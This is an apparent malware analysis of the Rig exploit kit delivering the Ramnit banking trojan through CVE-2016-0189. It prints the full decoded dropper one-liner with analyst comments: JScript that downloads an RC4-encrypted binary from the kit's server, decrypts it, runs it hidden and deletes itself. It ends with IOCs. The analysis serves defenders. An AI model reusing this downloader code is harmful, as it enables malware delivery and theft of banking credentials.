Source: Seamless gate leading to RigEK and Ramnit banker.
Tools: Fiddler, Internet Explorer, Firefox Web-Developer plugin
The observed URI parameters are from the RigEK URI 81.177.140[.]137 (AS8342 RTCOMM-AS, RU):
- NjA0MjE0/NDg3NDE4
- mano
- pano
- gift
- work
While investigating the Rig EK, I observed it serving the CVE-2016-0189 (VBScript Memory Corruption) exploit to the user-agent string “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET4.0C; .NET4.0E)”. Previously, the same exploit kit served the CVE-2015-8651 Adobe Flash exploit to the same user-agent string. Exploit selection is driven by the User-Agent, so replaying the landing page with a different UA may yield a different exploit or no exploit at all.
Steps:
(1) Obtain the RigEK response from Fiddler.
(2) Debug the payload in the Web Developer plugin by setting a breakpoint on bx (or on the return statement) and copying the decoded payload.
(3) Observe the full decoded VBS code from RigEK’s CVE-2016-0189 function, which is almost an exact copy of the public GitHub CVE-2016-0189 proof-of-concept (apart from a few variable renames and replacing ShellExecute with Run for obfuscation purposes). CVE-2016-0189 is also tracked under the Microsoft title “Scripting Engine Memory Corruption Vulnerability.”
(4) Finally, observe the Ramnit banker drop from the RigEK leveraging the exploit.
The CVE-2016-0189 exploit allows remote code execution and transfers control to the following decoded and beautified cmd command. It downloads an RC4-encrypted binary, decrypts it in memory, writes it to %tmp% under a random name, and runs it (via regsvr32 /s if it looks like a DLL, via cmd /c otherwise) — the Ramnit banker in this case:
// Analyst annotation of the decoded Rig EK one-liner (sample preserved byte-for-byte).
// Everything between `echo` and the `> o32.tmp` on the last line is JScript that the
// command writes to %tmp%\o32.tmp and then runs with wscript (see the tail of the last line).
// Rendering caveats: the `^` characters are cmd.exe escapes carried over from the original
// one-liner (`^ >`, `^ <`, `^ &`, `^ ^` read as >, <, &, ^); the spaces after the carets and
// after the `/` switches, the smart quotes and the en-dashes are beautifier / page artifacts.
// The switches appear to have been written as `cmd.exe /q /c cd /d "%tmp%"`.
cmd.exe / q / c cd / d “%tmp%” && echo
// O(l): random filename stem. Picks a value in [36^l, 36^(l+1)), renders it in base 36
// (j = 36) and drops the leading digit, yielding l pseudo-random alphanumeric characters.
// The “–” on the return line is an en-dash in the rendering; the sample subtracts.
function O(l) {
var w = “pow”,
j = 4 * 9;
return A.round((A[w](j, l + 1) – A.random() * A[w](j, l))).toString(j)[“slice”](1)
};
// V(k): downloader. k is WScript.Arguments (m in the try block below). Creates
// "WinHTTP.WinHTTPRequest.5.1" (e = "WinHTTP"), GETs k(1), sets Option(0) (n is 0;
// WinHttpRequest option 0 is the User-Agent string) to k(2), and on HTTP 200 returns
// the body decrypted by _() with k(0) as the key. Any other status returns undefined,
// which makes the caller's charCodeAt/indexOf throw and fall into the outer catch.
// NOTE(review): in the command line at the end of this listing the UA string is
// argument 1 and the URL argument 2 — the opposite of what this function expects.
// The argument order in the listing may have been altered in editing; confirm
// against the captured sample before reusing it as a signature.
function V(k) {
var y = a(e + “.” + e + “Request.5.1”);
y.setProxy(n);
y.open(“GET”, k(1), 1);
y.Option(n) = k(2);
y.send();
y.WaitForResponse();
if (200 == y.status) return _(y.responseText, k(n))
};
// _(k, e): textbook RC4. k is the ciphertext (as a string of byte-valued chars), e the key.
// Loop 1 initialises the state array c[0..255]; loop 2 is the key-scheduling algorithm
// (F = 5 + 5*50 = 255, so `& F` masks to 8 bits, i.e. mod 256); loop 3 is the PRGA,
// XORing each keystream byte into the ciphertext. Returns the plaintext as a string.
function _(k, e) {
for (var l = 0, n, c = [], F = 5 + 5 * 50, S = String, q = [], b = 0; 256 ^ > b; b++) c[b] = b;
for (b = 0; 256 ^ > b; b++) l = l + c[b] + e.charCodeAt(b % e.length) ^ & F, n = c[b], c[b] = c[l], c[l] = n;
for (var p = l = b = 0; p ^ < k.length; p++) b = b + 1 ^ & F, l = l + c[b] ^ & F, n = c[b], c[b] = c[l], c[l] = n, q.push(S.fromCharCode(k.charCodeAt(p) ^ ^ c[c[b] + c[l] ^ & F]));
return q.join(“”)
};
// Main body. Every failure is swallowed by the catch at the end, so the only
// guaranteed observable side effect is the self-delete after the try block.
try {
// a(b) is a CreateObject wrapper built with Function() so the string
// "CreateObject" never appears whole in the script body.
u = WScript, o = “Object”, A = Math, a = Function(“b”, “retu” + “rn u.Create” + o + “(b)”);
// P is derived from the string form of the WScript object and must equal "Script",
// since it is later used to build "Scripting.FileSystemObject", "WScript.Shell" and
// "ScriptFullName". q = FileSystemObject, m = command-line arguments, j = WScript.Shell,
// s = ADODB.Stream, x = 8 random chars + ".", K = path of this script (used to self-delete),
// E = ".exe". U is "DeleteFile" in mixed case (COM dispatch is case-insensitive) to dodge
// simple string matching.
P = (“” + u).split(” “)[1], M = “indexOf”, q = a(P + “ing.FileSystem” + o), m = u.Arguments, e = “WinHTTP”, Z = “cmd”, U = “DEleTefIle”, j = a(“W” + P + “.Shell”), s = a(“ADODB.Stream”), x = O(8) + “.”, p = “exe”, n = 0, K = u[P + “FullName”], E = “.” + p;
// Stream type 2 = text; with iso-8859-1 each character code 0–255 is written as exactly
// one byte, so the RC4-decrypted string round-trips to the original binary.
s.Type = 3 – 1;
s.Charset = “iso-8859-1”;
s.Open();
// One retry of the download on any exception. The bare `catch` without a parameter
// and braces is how the listing renders; the sample presumably reads `catch (N) { v = V(m) }`.
try {
v = V(m)
} catch
v = V(m)
};
// DLL-vs-EXE heuristic: read the byte 21 positions after the "PE\0\0" signature and
// treat a value above 31 (bit 0x20 set) as a DLL. NOTE(review): the IMAGE_FILE_DLL flag
// (0x2000) lives in the high byte of Characteristics at signature offset +23, not +21;
// either the listing was altered or the check in the sample is sloppy — verify on the raw file.
d = v.charCodeAt(20 + 1 + v[M](“PE\x00\x00”));
s.WriteText(v);
h = “dll”;
if (31 ^ < d) {
var z = 1;
x += h
} else x += p;
// 2 = create-or-overwrite. File lands in %tmp% (the cmd did `cd /d "%tmp%"`).
s.savetofile(x, 2);
s.Close();
// DLLs are loaded with `regsvr32.exe /s <file>`, EXEs run directly; both go through
// `cmd.exe /c` with window style 0 (hidden). z is only set in the DLL branch, so the
// `&&` short-circuits to the plain filename otherwise.
C = ” /c “;
Y = “gsvr32”;
z ^ & ^ & (x = “re” + Y + E + ” /s ” + x);
j.run(Z + E + C + x, 0)
} catch (N) {};
// Self-delete (FileSystemObject.DeleteFile on ScriptFullName), then the cmd side resumes:
// the echo is redirected into o32.tmp and run with wscript //B (batch mode, no prompts)
// //E:JScript (force the JScript engine despite the .tmp extension). Arguments are
// arg0 = RC4 key, then the UA string and the download URL (see the order caveat on V()).
// The "%5B.%5D" and "%5BREDACTED%5D" in the URL are the author's "[.]" defanging and
// "[REDACTED]" markers that got percent-encoded on publication; they are not in the sample.
q[U](K); > o32.tmp && start wscript //B //E:JScript o32.tmp “wexykukusw” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET4.0C; .NET4.0E)” “http://81.177.140%5B.%5D137/?NDg3NDE4&mano=%5BREDACTED%5D&pano=%5BREDACTED%5D&work=MzY0MzM0NjY=”
|
The shortened relevant function is as follows (commented):
Indicators of Compromise (IOCs):
08-15-2017 – RigEK server 81.177.140[.]137 (AS8342 RTCOMM-AS, RU)
08-15-2017 – RigEK exploit CVE-2016-0189 landing
SHA-1: 7993998d5f50bb7a3f8575fdfdb93f3386dbacde
Link
08-15-2017 – Ramnit Banker
SHA-1: 667d40d8c7c10f027ac57e91c509ddd56b8bc736